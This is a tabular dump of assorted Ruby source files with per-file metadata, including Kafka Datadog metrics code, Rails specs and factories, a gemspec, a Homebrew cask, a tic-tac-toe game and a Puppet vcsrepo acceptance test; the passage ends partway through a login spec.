hexsha (stringlengths 40–40) | size (int64 2–1.01M) | content (stringlengths 2–1.01M) | avg_line_length (float64 1.5–100) | max_line_length (int64 2–1k) | alphanum_fraction (float64 0.25–1) |
---|---|---|---|---|---|
18f9ba4bdb05be0c35e435235383ee825e36f00b | 63 | module Railcart
module Rails
VERSION = "0.1.0"
end
end
| 10.5 | 21 | 0.650794 |
e862e74fed792e13dd425a334427a3fc0ba15cc4 | 186 | # frozen_string_literal: true
$LOAD_PATH.unshift File.expand_path('../lib', __dir__)
require 'ruby_minitest_analyzer'
require 'minitest/autorun'
require 'pry'
require 'mocha/minitest'
| 20.666667 | 54 | 0.790323 |
39f1d5967dcbb74e4840db2990573414feb23e19 | 227 | # Load the Rails application.
require_relative 'application'
# Initialize the Rails application.
Rails.application.initialize!
# Initialize default meta tags.
DEFAULT_META = YAML.load_file(Rails.root.join('config/meta.yml'))
| 25.222222 | 65 | 0.797357 |
6a25f2c63cb77da9a3f076a3ff5e78b7c14a149a | 6,501 | # frozen_string_literal: true
begin
require "datadog/statsd"
rescue LoadError
$stderr.puts "In order to report Kafka client metrics to Datadog you need to install the `dogstatsd-ruby` gem."
raise
end
require "active_support/subscriber"
module Racecar
module Datadog
STATSD_NAMESPACE = "racecar"
class << self
def configure
yield self
end
def statsd
@statsd ||= ::Datadog::Statsd.new(host, port, namespace: namespace, tags: tags)
end
def statsd=(statsd)
clear
@statsd = statsd
end
def host
@host
end
def host=(host)
@host = host
clear
end
def port
@port
end
def port=(port)
@port = port
clear
end
def namespace
@namespace ||= STATSD_NAMESPACE
end
def namespace=(namespace)
@namespace = namespace
clear
end
def tags
@tags ||= []
end
def tags=(tags)
@tags = tags
clear
end
private
def clear
@statsd && @statsd.close
@statsd = nil
end
end
class StatsdSubscriber < ActiveSupport::Subscriber
private
%w[increment histogram count timing gauge].each do |type|
define_method(type) do |*args, **kwargs|
emit(type, *args, **kwargs)
end
end
def emit(type, *args, tags: {})
tags = tags.map {|k, v| "#{k}:#{v}" }.to_a
Racecar::Datadog.statsd.send(type, *args, tags: tags)
end
end
class ConsumerSubscriber < StatsdSubscriber
def process_message(event)
offset = event.payload.fetch(:offset)
create_time = event.payload.fetch(:create_time)
time_lag = create_time && ((Time.now - create_time) * 1000).to_i
tags = default_tags(event)
if event.payload.key?(:exception)
increment("consumer.process_message.errors", tags: tags)
else
timing("consumer.process_message.latency", event.duration, tags: tags)
increment("consumer.messages", tags: tags)
end
gauge("consumer.offset", offset, tags: tags)
# Not all messages have timestamps.
if time_lag
gauge("consumer.time_lag", time_lag, tags: tags)
end
end
def process_batch(event)
offset = event.payload.fetch(:last_offset)
messages = event.payload.fetch(:message_count)
last_create_time = event.payload.fetch(:last_create_time)
time_lag = last_create_time && ((Time.now - last_create_time) * 1000).to_i
tags = default_tags(event)
if event.payload.key?(:exception)
increment("consumer.process_batch.errors", tags: tags)
else
timing("consumer.process_batch.latency", event.duration, tags: tags)
count("consumer.messages", messages, tags: tags)
end
histogram("consumer.batch_size", messages, tags: tags)
gauge("consumer.offset", offset, tags: tags)
if time_lag
gauge("consumer.time_lag", time_lag, tags: tags)
end
end
def join_group(event)
tags = {
client: event.payload.fetch(:client_id),
group_id: event.payload.fetch(:group_id),
}
timing("consumer.join_group", event.duration, tags: tags)
if event.payload.key?(:exception)
increment("consumer.join_group.errors", tags: tags)
end
end
def leave_group(event)
tags = {
client: event.payload.fetch(:client_id),
group_id: event.payload.fetch(:group_id),
}
timing("consumer.leave_group", event.duration, tags: tags)
if event.payload.key?(:exception)
increment("consumer.leave_group.errors", tags: tags)
end
end
def poll_retry(event)
tags = {
client: event.payload.fetch(:client_id),
group_id: event.payload.fetch(:group_id),
}
rdkafka_error_code = event.payload.fetch(:exception).code.to_s.gsub(/\W/, '')
increment("consumer.poll.rdkafka_error.#{rdkafka_error_code}", tags: tags)
end
def main_loop(event)
tags = {
client: event.payload.fetch(:client_id),
group_id: event.payload.fetch(:group_id),
}
histogram("consumer.loop.duration", event.duration, tags: tags)
end
def pause_status(event)
duration = event.payload.fetch(:duration)
gauge("consumer.pause.duration", duration, tags: default_tags(event))
end
private
def default_tags(event)
{
client: event.payload.fetch(:client_id),
group_id: event.payload.fetch(:group_id),
topic: event.payload.fetch(:topic),
partition: event.payload.fetch(:partition),
}
end
attach_to "racecar"
end
class ProducerSubscriber < StatsdSubscriber
def produce_message(event)
client = event.payload.fetch(:client_id)
topic = event.payload.fetch(:topic)
message_size = event.payload.fetch(:message_size)
buffer_size = event.payload.fetch(:buffer_size)
tags = {
client: client,
topic: topic,
}
# This gets us the write rate.
increment("producer.produce.messages", tags: tags.merge(topic: topic))
# Information about typical/average/95p message size.
histogram("producer.produce.message_size", message_size, tags: tags.merge(topic: topic))
# Aggregate message size.
count("producer.produce.message_size.sum", message_size, tags: tags.merge(topic: topic))
# This gets us the avg/max buffer size per producer.
histogram("producer.buffer.size", buffer_size, tags: tags)
end
def deliver_messages(event)
client = event.payload.fetch(:client_id)
message_count = event.payload.fetch(:delivered_message_count)
tags = {
client: client,
}
timing("producer.deliver.latency", event.duration, tags: tags)
# Messages delivered to Kafka:
count("producer.deliver.messages", message_count, tags: tags)
end
def acknowledged_message(event)
tags = { client: event.payload.fetch(:client_id) }
# Number of messages ACK'd for the topic.
increment("producer.ack.messages", tags: tags)
end
attach_to "racecar"
end
end
end
| 26.21371 | 113 | 0.602061 |
1179b2ad0756b096d0c3217414e4a5deb18959ed | 113 | # encoding: UTF-8
require 'spec_helper'
describe CloudModel::Monitoring::Services::NginxChecks do
pending
end | 16.142857 | 57 | 0.787611 |
7a92c98b94e21266b2e27faa5aa8fdb23eb8f489 | 304 | # frozen_string_literal: true
require 'test_helper'
class VerificationsControllerTest < ActionController::TestCase
def test_show
subscription = subscriptions(:avery)
get :show, params: { subscription_id: subscription.id }
subscription.reload
assert subscription.validated?
end
end
| 21.714286 | 62 | 0.769737 |
03fa7cc9404c9c26d60b688e2a1ae4e676e28022 | 948 | Pod::Spec.new do |s|
s.name = "DataEyeGameAnalysis"
s.version = "2.7.5"
s.summary = "DataEye game analysis SDK of iOS platform. Please use the new version as far as possible, the new version is at https://github.com/DataEye/DataEyeGameAnalysis."
s.description = <<-DESC
This project is for DataEye game analysis SDK. Developer can get it easily on by cocoaPods.
DESC
s.homepage = "https://www.dataeye.com"
s.license = 'MIT'
s.author = { "xqwang" => "[email protected]" }
s.source = { :git => "https://github.com/DataEye/DataEyeGameAnalysis_V1.git", :tag => "2.7.5" }
s.platform = :ios, '6.0'
s.requires_arc = true
s.source_files = 'DataEyeGameAnalysis_V1/*.h'
s.vendored_libraries = 'DataEyeGameAnalysis_V1/*.a'
s.frameworks = "AdSupport", "Security", "CoreTelephony", "SystemConfiguration"
s.libraries = "z"
end
| 41.217391 | 184 | 0.622363 |
210ea0e467fab88b2a37d78798afdbdb41942186 | 310 | cask 'supersync' do
version '7.0.5'
sha256 '188a60ae85f0dc2d8df633dfb95241a65f163dd3b370c883f7f3366ad748d4f7'
url "https://supersync.com/downloads/SuperSync_#{version}.dmg"
appcast 'https://supersync.com/downloads.php'
name 'SuperSync'
homepage 'https://supersync.com/'
app 'SuperSync.app'
end
| 25.833333 | 75 | 0.76129 |
f8ce80927394cbde64c56aeb64f309364cc16889 | 8,304 | require 'rails_helper'
describe Post do
let(:post) { FactoryGirl.create(:post) }
let(:valid_title) { 'today-i-learned-about-clojure' }
it 'should have a valid factory' do
expect(post).to be_valid
end
it 'should require a body' do
post.body = ''
expect(post).to_not be_valid
end
it 'should have a like count that defaults to one' do
expect(post.likes).to eq 1
end
it 'should require a developer' do
post.developer = nil
expect(post).to_not be_valid
end
it 'should require a channel' do
post.channel = nil
expect(post).to_not be_valid
end
it 'should require a title' do
post.title = nil
expect(post).to_not be_valid
end
it 'should reject a title that is more than fifty chars' do
post.title = 'a' * 51
expect(post).to_not be_valid
end
describe '#generate_slug' do
it 'should create a slug' do
expect(post.slug).to be
end
it 'should allow a custom slug' do
custom_slugged_post = FactoryGirl.create(:post, slug: '1234')
expect(custom_slugged_post.slug).to eq '1234'
end
end
it 'should create a slug with dashes' do
post.title = 'Today I learned about clojure'
expect(post.send(:slugified_title)).to eq valid_title
end
it 'should create a slug without multiple dashes' do
post.title = 'Today I learned --- about clojure'
expect(post.send(:slugified_title)).to eq valid_title
end
it 'should remove whitespace from slug' do
post.title = ' Today I learned about clojure '
expect(post.send(:slugified_title)).to eq valid_title
end
it 'should not allow punctuation in slug' do
post.title = 'Today I! learned? & $ % about #clojure'
expect(post.send(:slugified_title)).to eq valid_title
end
describe '#body_size' do
it 'should return true when the post is equal or below 200 words' do
post.body = 'word ' * 200
expect(post.send(:body_size)).to be
end
it 'should return false when the post is above 200 words' do
post.body = 'word ' * 201
expect(post.send(:body_size)).to eq false
end
it 'should behave like a validation and return an appropriate message' do
post.body = 'word ' * 200
expect(post).to be_valid
post.body = 'word ' * 201
expect(post).to_not be_valid
expect(post.errors.messages[:body]).to eq ['of this post is too long. It is 1 word over the limit of 200 words']
post.body = 'word ' * 300
expect(post).to_not be_valid
expect(post.errors.messages[:body]).to eq ['of this post is too long. It is 100 words over the limit of 200 words']
post.body = 'word ' * 400
expect(post).to_not be_valid
expect(post.errors.messages[:body]).to eq ['of this post is too long. It is 200 words over the limit of 200 words']
end
end
context 'it should count its words' do
it 'with trailing spaces' do
post = FactoryGirl.create(:post, body: 'word ' * 150)
expect(post.send(:word_count)).to eq 150
end
it 'with no trailing spaces' do
post = FactoryGirl.create(:post, body: ('word ' * 150).strip)
expect(post.send(:word_count)).to eq 150
end
it 'with one word' do
post = FactoryGirl.create(:post, body: 'word')
expect(post.send(:word_count)).to eq 1
end
end
context 'it should know how many words are available' do
it 'with trailing spaces' do
post = FactoryGirl.create(:post, body: 'word ' * 150)
expect(post.send(:words_remaining)).to eq 50
end
it 'with no trailing spaces' do
post = FactoryGirl.create(:post, body: ('word ' * 150).strip)
expect(post.send(:words_remaining)).to eq 50
end
it 'with one word' do
post = FactoryGirl.create(:post, body: 'word')
expect(post.send(:words_remaining)).to eq 199
end
it 'with too many words' do
post = FactoryGirl.build(:post, body: 'word ' * 300)
expect(post.send(:words_remaining)).to eq(-100)
end
end
describe '#search' do
it 'finds by developer' do
needle = %w(brian jake).map do |author_name|
FactoryGirl.create :post, developer: FactoryGirl.create(:developer, username: author_name)
end.last
expect(described_class.search('jake')).to eq [needle]
end
it 'finds by channel' do
needle = %w(vim ruby).map do |channel_name|
FactoryGirl.create :post, channel: FactoryGirl.create(:channel, name: channel_name)
end.last
expect(described_class.search('ruby')).to eq [needle]
end
it 'finds by title' do
needle = %w(postgres sql).map do |title|
FactoryGirl.create :post, title: title
end.last
expect(described_class.search('sql')).to eq [needle]
end
it 'finds by body' do
needle = %w(postgres sql).map do |body|
FactoryGirl.create :post, body: body
end.last
expect(described_class.search('sql')).to eq [needle]
end
it 'ranks matches by title, then developer or channel, then body' do
posts = [
FactoryGirl.create(:post, body: 'needle'),
FactoryGirl.create(:post, channel: FactoryGirl.create(:channel, name: 'needle')),
FactoryGirl.create(:post, developer: FactoryGirl.create(:developer, username: 'needle')),
FactoryGirl.create(:post, title: 'needle')
].reverse
ids = described_class.search('needle').pluck(:id)
expect(ids[1..-2]).to match_array posts.map(&:id)[1..-2]
expect([ids.first, ids.last]).to eq [posts.map(&:id).first, posts.map(&:id).last]
end
it 'breaks ties by post date' do
FactoryGirl.create(:post, title: 'older', body: 'needle', created_at: 2.days.ago)
FactoryGirl.create(:post, title: 'newer', body: 'needle')
expect(described_class.search('needle').map(&:title)).to eq %w(newer older)
end
end
it 'knows if its max likes count is a factor of ten' do
method = :likes_threshold?
post.max_likes = 10
expect(post.send(method)).to eq true
post.max_likes = 11
expect(post.send(method)).to eq false
end
it 'should never have a negative like count' do
post.likes = -1
expect(post).to_not be_valid
end
describe '#publish' do
it 'sets the post to published = true' do
post.publish
expect(post.published_at).to be
end
end
context 'slack integration on publication' do
describe 'new post, published is true' do
it 'should notify slack' do
post = FactoryGirl.build(:post)
expect(post).to receive(:notify_slack)
post.save
end
end
describe 'new post, published is false' do
it 'should not notify slack' do
post = FactoryGirl.build(:post, :draft)
expect(post).to_not receive(:notify_slack)
post.save
end
end
describe 'existing post, published changes to true' do
it 'should notify slack' do
post = FactoryGirl.create(:post, :draft)
post.published_at = Time.now
expect(post).to receive(:notify_slack)
post.save
end
end
end
describe '#increment_likes' do
it 'increments max likes when likes equals max likes' do
post = FactoryGirl.create(:post, likes: 5, max_likes: 5)
post.increment_likes
expect(post.likes).to eq 6
expect(post.max_likes).to eq 6
end
it 'does not change max likes when likes are less than max likes' do
post = FactoryGirl.create(:post, likes: 3, max_likes: 5)
post.increment_likes
expect(post.likes).to eq 4
expect(post.max_likes).to eq 5
end
end
describe '#decrement_likes' do
it 'does not change max likes' do
post = FactoryGirl.create(:post, likes: 5, max_likes: 5)
post.decrement_likes
expect(post.likes).to eq 4
expect(post.max_likes).to eq 5
end
end
context 'slack integration on tens of likes' do
describe 'reaches the milestone more than once' do
it 'should notify slack only once' do
post = FactoryGirl.create(:post, likes: 9, max_likes: 9)
expect(post).to receive(:notify_slack).once
post.increment_likes # 10
post.decrement_likes # 9
post.increment_likes # 10
post.increment_likes # 11
post.decrement_likes # 10
end
end
end
end
| 28.634483 | 121 | 0.647881 |
f71ac22dfee4ec66657a52f30a5fa4b4bbb5895c | 3,561 | require 'factory_girl'
FactoryGirl.define do
factory :alchemy_dummy_user, class: 'DummyUser' do
sequence(:email) { |n| "john.#{n}@doe.com" }
password 's3cr3t'
alchemy_roles ['member']
trait :as_admin do
alchemy_roles ['admin']
end
trait :as_author do
alchemy_roles ['author']
end
trait :as_editor do
alchemy_roles ['editor']
end
end
factory :language, :class => 'Alchemy::Language' do
name 'Deutsch'
code 'de'
default true
frontpage_name 'Intro'
page_layout { Alchemy::Config.get(:default_language)['page_layout'] }
public true
site { Alchemy::Site.first }
factory :klingonian do
name 'Klingonian'
code 'kl'
frontpage_name 'Tuq'
default false
end
factory :english do
name 'English'
code 'en'
frontpage_name 'Intro'
default false
end
end
factory :page, :class => 'Alchemy::Page' do
language { Alchemy::Language.default || FactoryGirl.create(:language) }
sequence(:name) { |n| "A Page #{n}" }
parent_id { (Alchemy::Page.find_by_language_root(true) || FactoryGirl.create(:language_root_page)).id }
page_layout "standard"
# This speeds up the creation of pages dramatically. Pass :do_not_autogenerate => false to generate elements
do_not_autogenerate true
factory :language_root_page do
name 'Startseite'
page_layout { language.page_layout }
language_root true
public true
parent_id { Alchemy::Page.root.id }
end
factory :public_page do
sequence(:name) { |n| "A Public Page #{n}" }
public true
end
factory :systempage do
name "Systempage"
parent_id { Alchemy::Page.root.id }
language_root false
page_layout nil
language nil
end
factory :restricted_page do
name "Restricted page"
restricted true
end
end
factory :cell, :class => 'Alchemy::Cell' do
page { Alchemy::Page.find_by(language_root: true) || FactoryGirl.create(:language_root_page) }
name "a_cell"
end
factory :element, :class => 'Alchemy::Element' do
name 'article'
create_contents_after_create false
factory :unique_element do
unique true
name 'header'
end
end
factory :picture, :class => 'Alchemy::Picture' do
image_file File.new(File.expand_path('../../../../spec/fixtures/image.png', __FILE__))
name 'image'
image_file_name 'image.png'
upload_hash Time.now.hash
end
factory :content, :class => 'Alchemy::Content' do
name "text"
essence_type "Alchemy::EssenceText"
association :essence, :factory => :essence_text
end
factory :essence_text, :class => 'Alchemy::EssenceText' do
body ''
end
factory :essence_picture, :class => 'Alchemy::EssencePicture' do
picture
end
factory :essence_file, :class => 'Alchemy::EssenceFile' do
attachment
end
factory :attachment, :class => 'Alchemy::Attachment' do
file File.new(File.expand_path('../../../../spec/fixtures/image.png', __FILE__))
name 'image'
file_name 'image.png'
end
factory :event do
name 'My Event'
hidden_name 'not shown'
starts_at DateTime.new(2012, 03, 02, 8, 15)
ends_at DateTime.new(2012, 03, 02, 19, 30)
lunch_starts_at DateTime.new(2012, 03, 02, 12, 15)
lunch_ends_at DateTime.new(2012, 03, 02, 13, 45)
description "something\nfancy"
published false
entrance_fee 12.3
end
factory :site, class: 'Alchemy::Site' do
name 'A Site'
host 'domain.com'
end
end
| 24.060811 | 108 | 0.651502 |
e802626a0ac244b385b6362c4783cbc1b8e96ee5 | 2,063 | # NOTE: only doing this in development as some production environments (Heroku)
# NOTE: are sensitive to local FS writes, and besides -- it's just not proper
# NOTE: to have a dev-mode tool do its thing in production.
if Rails.env.development?
require 'annotate'
task :set_annotation_options do
# You can override any of these by setting an environment variable of the
# same name.
Annotate.set_defaults(
'active_admin' => 'false',
'additional_file_patterns' => [],
'routes' => 'false',
'models' => 'true',
'position_in_routes' => 'before',
'position_in_class' => 'before',
'position_in_test' => 'before',
'position_in_fixture' => 'before',
'position_in_factory' => 'before',
'position_in_serializer' => 'before',
'show_foreign_keys' => 'true',
'show_complete_foreign_keys' => 'false',
'show_indexes' => 'true',
'simple_indexes' => 'false',
'model_dir' => 'app/models',
'root_dir' => '',
'include_version' => 'false',
'require' => '',
'exclude_tests' => 'false',
'exclude_fixtures' => 'false',
'exclude_factories' => 'false',
'exclude_serializers' => 'false',
'exclude_scaffolds' => 'true',
'exclude_controllers' => 'true',
'exclude_helpers' => 'true',
'exclude_sti_subclasses' => 'false',
'ignore_model_sub_dir' => 'false',
'ignore_columns' => nil,
'ignore_routes' => nil,
'ignore_unknown_models' => 'false',
'hide_limit_column_types' => 'integer,bigint,boolean',
'hide_default_column_types' => 'json,jsonb,hstore',
'skip_on_db_migrate' => 'false',
'format_bare' => 'true',
'format_rdoc' => 'false',
'format_yard' => 'false',
'format_markdown' => 'false',
'sort' => 'false',
'force' => 'false',
'frozen' => 'false',
'classified_sort' => 'true',
'trace' => 'false',
'wrapper_open' => nil,
'wrapper_close' => nil,
'with_comment' => 'true'
)
end
Annotate.load_tasks
end
| 34.383333 | 79 | 0.594765 |
bb211c12ac0fbee72223d5e6968b5fbcc8859a9f | 1,892 | test_name 'C3448 - checkout a tag (http protocol)'
# Globals
repo_name = 'testrepo_tag_checkout'
tag = '0.0.2'
hosts.each do |host|
ruby = (host.is_pe? && '/opt/puppet/bin/ruby') || 'ruby'
tmpdir = host.tmpdir('vcsrepo')
step 'setup - create repo' do
install_package(host, 'git')
my_root = File.expand_path(File.join(File.dirname(__FILE__), '../../../..'))
scp_to(host, "#{my_root}/acceptance/files/create_git_repo.sh", tmpdir)
on(host, "cd #{tmpdir} && ./create_git_repo.sh")
end
step 'setup - start http server' do
http_daemon =<<-EOF
require 'webrick'
server = WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => "#{tmpdir}")
WEBrick::Daemon.start
server.start
EOF
create_remote_file(host, '/tmp/http_daemon.rb', http_daemon)
on(host, "#{ruby} /tmp/http_daemon.rb")
end
teardown do
on(host, "rm -fr #{tmpdir}")
on(host, "ps ax | grep '#{ruby} /tmp/http_daemon.rb' | grep -v grep | awk '{print \"kill -9 \" $1}' | sh ; sleep 1")
end
step 'get tag sha from repo' do
on(host, "git --git-dir=#{tmpdir}/testrepo.git rev-list HEAD | tail -1") do |res|
@sha = res.stdout.chomp
end
end
step 'checkout a tag with puppet' do
pp = <<-EOS
vcsrepo { "#{tmpdir}/#{repo_name}":
ensure => present,
source => "http://#{host}:8000/testrepo.git",
provider => git,
revision => '#{tag}',
}
EOS
apply_manifest_on(host, pp, :catch_failures => true)
apply_manifest_on(host, pp, :catch_changes => true)
end
step "verify checkout out tag is #{tag}" do
on(host, "ls #{tmpdir}/#{repo_name}/.git/") do |res|
fail_test('checkout not found') unless res.stdout.include? "HEAD"
end
on(host,"git --git-dir=#{tmpdir}/#{repo_name}/.git name-rev HEAD") do |res|
fail_test('tag not found') unless res.stdout.include? "#{tag}"
end
end
end
| 29.5625 | 120 | 0.616808 |
08505ae8be54802710212f59abdb34098a90e0b0 | 2,219 | class TicTacToe
autoload :Printer, "tic_tac_toe/printer"
autoload :Game, "tic_tac_toe/game"
autoload :RandomPlayer, "tic_tac_toe/random_player"
autoload :ConsolePlayer, "tic_tac_toe/console_player"
autoload :MonteCarloPlayer, "tic_tac_toe/monte_carlo_player"
autoload :GrpcPlayer, "tic_tac_toe/grpc_player"
BadMove = Class.new(StandardError)
STATES = [
STATE_WIN = Object.new,
STATE_DRAW = Object.new,
STATE_RUNNING = Object.new,
].freeze
EMPTY = Object.new
PLAYERS = [
PLAYER_X = Object.new,
PLAYER_O = Object.new,
].freeze
WINS = [
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[0, 3, 6],
[1, 4, 7],
[2, 5, 8],
[0, 4, 8],
[2, 4, 6],
].map(&:freeze).freeze
def self.empty_board
new(
board: Array.new(9) { EMPTY },
player: PLAYER_X,
history: []
)
end
attr_reader :board, :player, :history
def initialize(board:, player:, history:)
@board = board.map(&:freeze).freeze
@player = player
@history = history
end
def available_moves
return [] unless state == STATE_RUNNING
@available_moves ||=
@board
.map
.with_index
.select { |t, _| t == EMPTY }
.map { |_, i| i }
end
def play(move)
ensure_valid_move!(move)
new_board = @board.dup
new_board[move] = player
self.class.new(
board: new_board,
player: opposite_player,
history: history.dup.append(move)
)
end
def state
@state ||=
if win?
STATE_WIN
elsif @board.none? { |x| x == EMPTY }
STATE_DRAW
else
STATE_RUNNING
end
end
def running?
state == STATE_RUNNING
end
def draw?
state == STATE_DRAW
end
def win?
return @win if defined?(@win)
@win =
WINS
.map { |x, y, z| [@board[x], @board[y], @board[z]].uniq }
.any? { |x| (x.size == 1) && x.first != EMPTY }
end
def winner
return unless win?
opposite_player
end
private
def ensure_valid_move!(move)
return if available_moves.include?(move)
raise BadMove, "#{move} is not a valid move."
end
def opposite_player
@player == PLAYER_X ? PLAYER_O : PLAYER_X
end
end
| 18.491667 | 65 | 0.588103 |
1d7e698c49a37eac90af7510ac7a1a6aa0526637 | 377 | #! /usr/local/bin/ruby
require 'deduction.rb'
ded = CDeduction.new
buf = $mysql.query("select id from relation_node order by id desc limit 1;")
id = -1
id = ARGV[0].to_i if( ARGV[0] != nil )
if( id > 0 )
ded.read(id)
ded.printRel( 2 )
else
(buf.fetch_hash['id'].to_i - 1).times do |i|
ded.read(i + 1)
ded.printRel( 2 )
print "\n"
end
end
$mysql.close
| 15.708333 | 76 | 0.612732 |
e82b94a378989795e344029ecc282276bef488a4 | 1,505 | module Monitr
module Configurable
# Override this method in your Configurable (optional)
#
# Called once after the Configurable has been sent to the block and attributes have been
# set. Do any post-processing on attributes here
def prepare
end
def reset
end
# Override this method in your Configurable (optional)
#
# Called once during evaluation of the config file. Return true if valid, false otherwise
#
# A convenience method 'complain' is available that will print out a message and return false,
# making it easy to report multiple validation errors:
#
# def valid?
# valid = true
# valid &= complain("You must specify the 'pid_file' attribute for :memory_usage") if self.pid_file.nil?
# valid &= complain("You must specify the 'above' attribute for :memory_usage") if self.above.nil?
# valid
# end
def valid?
true
end
def base_name
x = 1 # fix for MRI's local scope optimization bug DO NOT REMOVE!
self.class.name.split('::').last
end
def friendly_name
base_name
end
def self.complain(text, c = nil)
watch = c.watch rescue nil
msg = ""
msg += "#{watch.name}: " if watch
msg += text
msg += " for #{c.friendly_name}" if c
applog(watch, :error, msg)
false
end
def complain(text, c = nil)
Configurable.complain(text, c)
end
end
end | 26.403509 | 112 | 0.613289 |
87e8abaf8507a2cb675309f40104acbcdaeb84b2 | 1,328 | #-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2015 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
FactoryGirl.define do
factory :journal_wiki_content_journal, class: Journal::WikiContentJournal do
page_id 1
end
end
| 39.058824 | 91 | 0.765813 |
116f003777d99098c99f530198d89c83ee740c84 | 1,911 | class UsersController < ApplicationController
skip_before_action :authorized, only: %i[new create]
def index
User.who_to_follow_offset = 0
User.current_user = current_user
@posts = current_user.all_the_posts_for_timeline
@who_to_follow = current_user.who_to_follow
end
def new
redirect_to root_path if logged_in?
@user = User.new
end
def create
@user = User.new(user_params)
@user.photo = Faker::Avatar.image(slug: params[:username], size: '100x100', format: 'jpg')
@user.cover_image = Faker::LoremFlickr.image(size: '744x249', search_terms: ['nature'])
if @user.save
log_in @user
redirect_to root_path
else
@user.username = @user.full_name = ''
render 'new'
end
end
def search
User.who_to_follow_offset += 3
@who_to_follow = current_user.who_to_follow
render partial: 'users/index/who_to_follow'
end
def connection
user = User.find_by(username: params[:username])
User.current_user = user
@headline = headline(user, params[:slug])
if @headline.nil?
redirect_to root_path
else
@user_list = user_list(user, params[:slug])
@who_to_follow = user.who_to_follow
render partial: 'users/connection/user_list'
end
end
def follow
Following.create(follower_id: current_user.id, followed_id: params[:id])
redirect_to user_show_path(slug: User.find(params[:id]).username)
end
def unfollow
Following.destroy(Following.where(follower_id: current_user.id, followed_id: params[:id]).first.id)
redirect_to user_show_path(slug: User.find(params[:id]).username)
end
def show
User.current_user = current_user
@user = User.find_by(username: params[:slug])
@posts = @user.microposts
@who_to_follow = @user.followers.limit(3)
end
private
def user_params
params.require(:user).permit(:username, :full_name)
end
end
| 26.178082 | 103 | 0.69911 |
bb78078cb8da76b13b3ebf58753ec077f5b5a7fd | 502 | RSpec.shared_context "yammer GET" do |endpoint|
let(:request_url) { "https://www.yammer.com/api/v1/#{endpoint}" }
let!(:mock) {
stub_request(:get, request_url).with(
# See https://github.com/bblimke/webmock/issues/693
query: hash_including({}),
headers: {
'Authorization' => 'Bearer shakenn0tst1rr3d'
}
).
to_return(
status: 200,
body: {status: "ok"}.to_json,
headers: {
"Content-type": "application/json"
}
)
}
end
| 25.1 | 67 | 0.583665 |
edcf3f315a95d722336c56781d9ac7a897c815d3 | 1,162 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = "aws-sdk-athena"
spec.version = File.read(File.expand_path("../VERSION", __FILE__)).strip
spec.summary = "AWS SDK for Ruby - Amazon Athena"
spec.description = "Official AWS Ruby gem for Amazon Athena. This gem is part of the AWS SDK for Ruby."
spec.author = "Amazon Web Services"
spec.homepage = "https://github.com/aws/aws-sdk-ruby"
spec.license = "Apache-2.0"
spec.email = ["[email protected]"]
spec.require_paths = ["lib"]
spec.files = Dir["lib/**/*.cr"]
spec.metadata = {
"source_code_uri" => "https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-athena",
"changelog_uri" => "https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-athena/CHANGELOG.md"
}
spec.add_dependency("aws-sdk-core", "~> 3', '>= 3.109.0")
spec.add_dependency("aws-sigv4", "~> 1.1")
end
| 36.3125 | 107 | 0.662651 |
1d7099ba44389006fb5017d54e2a6a23fc7df705 | 29,704 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Login' do
include TermsHelper
include UserLoginHelper
before do
stub_authentication_activity_metrics(debug: true)
end
describe 'password reset token after successful sign in' do
it 'invalidates password reset token' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
user = create(:user)
expect(user.reset_password_token).to be_nil
visit new_user_password_path
fill_in 'user_email', with: user.email
click_button 'Reset password'
user.reload
expect(user.reset_password_token).not_to be_nil
gitlab_sign_in(user)
expect(current_path).to eq root_path
user.reload
expect(user.reset_password_token).to be_nil
end
end
describe 'initial login after setup' do
it 'allows the initial admin to create a password' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
# This behavior is dependent on there only being one user
User.delete_all
user = create(:admin, password_automatically_set: true)
visit root_path
expect(current_path).to eq edit_user_password_path
expect(page).to have_content('Please create a password for your new account.')
fill_in 'user_password', with: 'password'
fill_in 'user_password_confirmation', with: 'password'
click_button 'Change your password'
expect(current_path).to eq new_user_session_path
expect(page).to have_content(I18n.t('devise.passwords.updated_not_active'))
fill_in 'user_login', with: user.username
fill_in 'user_password', with: 'password'
click_button 'Sign in'
expect(current_path).to eq root_path
end
it 'does not show flash messages when login page' do
visit root_path
expect(page).not_to have_content('You need to sign in or sign up before continuing.')
end
end
describe 'with a blocked account' do
it 'prevents the user from logging in' do
expect(authentication_metrics)
.to increment(:user_blocked_counter)
.and increment(:user_unauthenticated_counter)
.and increment(:user_session_destroyed_counter).twice
user = create(:user, :blocked)
gitlab_sign_in(user)
expect(page).to have_content('Your account has been blocked.')
end
it 'does not update Devise trackable attributes', :clean_gitlab_redis_shared_state do
expect(authentication_metrics)
.to increment(:user_blocked_counter)
.and increment(:user_unauthenticated_counter)
.and increment(:user_session_destroyed_counter).twice
user = create(:user, :blocked)
expect { gitlab_sign_in(user) }.not_to change { user.reload.sign_in_count }
end
end
describe 'with an unconfirmed email address' do
let!(:user) { create(:user, confirmed_at: nil) }
let(:grace_period) { 2.days }
before do
stub_application_setting(send_user_confirmation_email: true)
allow(User).to receive(:allow_unconfirmed_access_for).and_return grace_period
end
context 'within the grace period' do
it 'allows to login' do
